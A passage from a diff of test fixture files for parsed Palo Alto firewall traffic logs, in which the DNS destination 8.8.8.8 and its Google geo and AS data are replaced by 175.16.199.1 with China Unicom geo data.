16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24124,1,60609,53,20365,53,0x400019,udp,allow,232,100,132,2,2018/11/30 16:09:13,0,any,0,32091166,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031722600Z", + "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24124,1,60609,53,20365,53,0x400019,udp,allow,232,100,132,2,2018/11/30 16:09:13,0,any,0,32091166,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:46.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -9123,27 +9210,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 127, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -9162,7 +9251,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24153,1,3248,53,61464,53,0x400019,udp,allow,206,79,127,2,2018/11/30 16:09:13,0,any,0,32091167,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24153,1,3248,53,61464,53,0x400019,udp,allow,206,79,127,2,2018/11/30 16:09:13,0,any,0,32091167,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -9177,7 +9266,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -9199,7 +9288,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:hsTAFtOdeb7+Ofe152B+9h69mbE=" + "community_id": "1:pCKdrcOhkESfAZbDDUbNx9zHb+E=" } }, "sequence_number": 32091167, @@ -9219,8 +9308,8 @@ ], "network": { "community_id": [ - "1:v2Rn2HMvdhM3B2CXYva9UePt+Og=", - "1:hsTAFtOdeb7+Ofe152B+9h69mbE=" + "1:iZ6cuDEytPuGtD80pU/7es+QhfI=", + "1:pCKdrcOhkESfAZbDDUbNx9zHb+E=" ], "transport": "udp", "application": "dns", @@ -9260,14 +9349,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941984830Z", - "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24153,1,3248,53,61464,53,0x400019,udp,allow,206,79,127,2,2018/11/30 16:09:13,0,any,0,32091167,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031726300Z", + "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24153,1,3248,53,61464,53,0x400019,udp,allow,206,79,127,2,2018/11/30 16:09:13,0,any,0,32091167,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:46.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -9290,27 +9379,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 105, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -9329,7 +9420,7 @@ "packets": 1, "ip": "192.168.15.196" }, - "message": "192.168.15.196,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24122,1,49284,53,42877,53,0x400019,udp,allow,194,89,105,2,2018/11/30 16:09:13,0,any,0,32091168,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24122,1,49284,53,42877,53,0x400019,udp,allow,194,89,105,2,2018/11/30 16:09:13,0,any,0,32091168,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -9344,7 +9435,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -9366,7 +9457,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:htOXUg3QOGd0fpgLjYzQlvRMzUQ=" + "community_id": "1:/QRiz8XrvAKWvL7InyO5YWn7Unw=" } }, "sequence_number": 32091168, @@ -9386,8 +9477,8 @@ ], "network": { "community_id": [ - "1:tO559KwdaAXfBh7HmZSLp9/JUJQ=", - "1:htOXUg3QOGd0fpgLjYzQlvRMzUQ=" + "1:zALUieRh+c7GcKa4k74kugaW5NQ=", + "1:/QRiz8XrvAKWvL7InyO5YWn7Unw=" ], "transport": "udp", "application": "dns", @@ -9427,14 +9518,14 @@ ], "ip": [ "192.168.15.196", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941988310Z", - "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.196,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24122,1,49284,53,42877,53,0x400019,udp,allow,194,89,105,2,2018/11/30 16:09:13,0,any,0,32091168,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031730500Z", + "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24122,1,49284,53,42877,53,0x400019,udp,allow,194,89,105,2,2018/11/30 16:09:13,0,any,0,32091168,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:46.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -9457,27 +9548,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 172, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -9496,7 +9589,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24171,1,57732,53,5918,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:13,0,any,0,32091169,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24171,1,57732,53,5918,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:13,0,any,0,32091169,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -9511,7 +9604,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -9533,7 +9626,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:gHWCOTtilTTqOn7fOKh7zVq45Xw=" + "community_id": "1:uD+W7tTSk79NUi3PpwMi06q1UWI=" } }, "sequence_number": 32091169, @@ -9553,8 +9646,8 @@ ], "network": { "community_id": [ - "1:aMEfJV/f54B1+0RNtWjw49JfNFU=", - "1:gHWCOTtilTTqOn7fOKh7zVq45Xw=" + "1:XeWsMGIbT/x162pVo0NCV89u0gM=", + "1:uD+W7tTSk79NUi3PpwMi06q1UWI=" ], "transport": "udp", "application": "dns", @@ -9594,14 +9687,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941991841Z", - "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24171,1,57732,53,5918,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:13,0,any,0,32091169,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031735800Z", + "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24171,1,57732,53,5918,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:13,0,any,0,32091169,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:46.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -9624,27 +9717,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 134, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -9663,7 +9758,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24069,1,49195,53,28944,53,0x400019,udp,allow,212,78,134,2,2018/11/30 16:09:13,0,any,0,32091170,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24069,1,49195,53,28944,53,0x400019,udp,allow,212,78,134,2,2018/11/30 16:09:13,0,any,0,32091170,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -9678,7 +9773,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -9700,7 +9795,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:OGDvpe1+4KQfCsxk0I61jm0+DIc=" + "community_id": "1:PTYX9HnjKczQum2EUlGgqrCBONE=" } }, "sequence_number": 32091170, @@ -9720,8 +9815,8 @@ ], "network": { "community_id": [ - "1:WgGQfntwYS3voQPhGfI/qhx0SVk=", - "1:OGDvpe1+4KQfCsxk0I61jm0+DIc=" + "1:45Rl8R/9Ldlq3xqwvMO1f+V8LQA=", + "1:PTYX9HnjKczQum2EUlGgqrCBONE=" ], "transport": "udp", "application": "dns", @@ -9761,14 +9856,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941995309Z", - "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24069,1,49195,53,28944,53,0x400019,udp,allow,212,78,134,2,2018/11/30 16:09:13,0,any,0,32091170,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031739800Z", + "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24069,1,49195,53,28944,53,0x400019,udp,allow,212,78,134,2,2018/11/30 16:09:13,0,any,0,32091170,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:46.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -9791,27 +9886,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 179, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -9830,7 +9927,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24282,1,17266,53,13415,53,0x400019,udp,allow,252,73,179,2,2018/11/30 16:09:13,0,any,0,32091171,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24282,1,17266,53,13415,53,0x400019,udp,allow,252,73,179,2,2018/11/30 16:09:13,0,any,0,32091171,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -9845,7 +9942,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -9867,7 +9964,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:po/vy4RoD5WeFPgCZnduQkE47yY=" + "community_id": "1:WZDvBFVegIhMMGv+nhAyDd8fRs0=" } }, "sequence_number": 32091171, @@ -9887,8 +9984,8 @@ ], "network": { "community_id": [ - "1:RM5edUgZPywM/hIejzFVba+A4co=", - "1:po/vy4RoD5WeFPgCZnduQkE47yY=" + "1:SePV/IDh1jjVyN5T4udJ8C1xa+I=", + "1:WZDvBFVegIhMMGv+nhAyDd8fRs0=" ], "transport": "udp", "application": "dns", @@ -9928,14 +10025,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941998818Z", - "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24282,1,17266,53,13415,53,0x400019,udp,allow,252,73,179,2,2018/11/30 16:09:13,0,any,0,32091171,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031746900Z", + "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24282,1,17266,53,13415,53,0x400019,udp,allow,252,73,179,2,2018/11/30 16:09:13,0,any,0,32091171,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:46.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -9958,27 +10055,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 218, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -9997,7 +10096,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24218,1,48631,53,2489,53,0x400019,udp,allow,308,90,218,2,2018/11/30 16:09:13,0,any,0,32091172,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24218,1,48631,53,2489,53,0x400019,udp,allow,308,90,218,2,2018/11/30 16:09:13,0,any,0,32091172,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -10012,7 +10111,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -10034,7 +10133,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:wIxYOe++IxscmxBcRwrPGEIlZF4=" + "community_id": "1:qcxcaTpyWF+yTo0gacaLCRvVTdc=" } }, "sequence_number": 32091172, @@ -10054,8 +10153,8 @@ ], "network": { "community_id": [ - "1:jJo7FJWI3gHbC96nTsyT17hVP98=", - "1:wIxYOe++IxscmxBcRwrPGEIlZF4=" + "1:p7bJDKhUeffJiJ7yfQZH2E44Dvs=", + "1:qcxcaTpyWF+yTo0gacaLCRvVTdc=" ], "transport": "udp", "application": "dns", @@ -10095,14 +10194,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.942002305Z", - "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24218,1,48631,53,2489,53,0x400019,udp,allow,308,90,218,2,2018/11/30 16:09:13,0,any,0,32091172,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031754Z", + "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24218,1,48631,53,2489,53,0x400019,udp,allow,308,90,218,2,2018/11/30 16:09:13,0,any,0,32091172,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:46.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -10125,27 +10224,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 172, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -10164,7 +10265,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24200,1,58540,53,49328,53,0x400019,udp,allow,249,77,172,2,2018/11/30 16:09:13,0,any,0,32091173,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24200,1,58540,53,49328,53,0x400019,udp,allow,249,77,172,2,2018/11/30 16:09:13,0,any,0,32091173,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -10179,7 +10280,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -10201,7 +10302,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:xN7R3QI47jVAQhgJrOAvdsu+oes=" + "community_id": "1:JR/9wbsZU1i/WfnfKXg/pJ74JRA=" } }, "sequence_number": 32091173, @@ -10221,8 +10322,8 @@ ], "network": { "community_id": [ - "1:eWhg/7DfJGJNfW90sKt5WEYnI9g=", - "1:xN7R3QI47jVAQhgJrOAvdsu+oes=" + "1:o5e7XAcaqhJxDKgm/3IDk32KJeg=", + "1:JR/9wbsZU1i/WfnfKXg/pJ74JRA=" ], "transport": "udp", "application": "dns", @@ -10262,14 +10363,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.942005759Z", - "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24200,1,58540,53,49328,53,0x400019,udp,allow,249,77,172,2,2018/11/30 16:09:13,0,any,0,32091173,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031759600Z", + "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24200,1,58540,53,49328,53,0x400019,udp,allow,249,77,172,2,2018/11/30 16:09:13,0,any,0,32091173,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:46.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -10292,27 +10393,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 305, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -10331,7 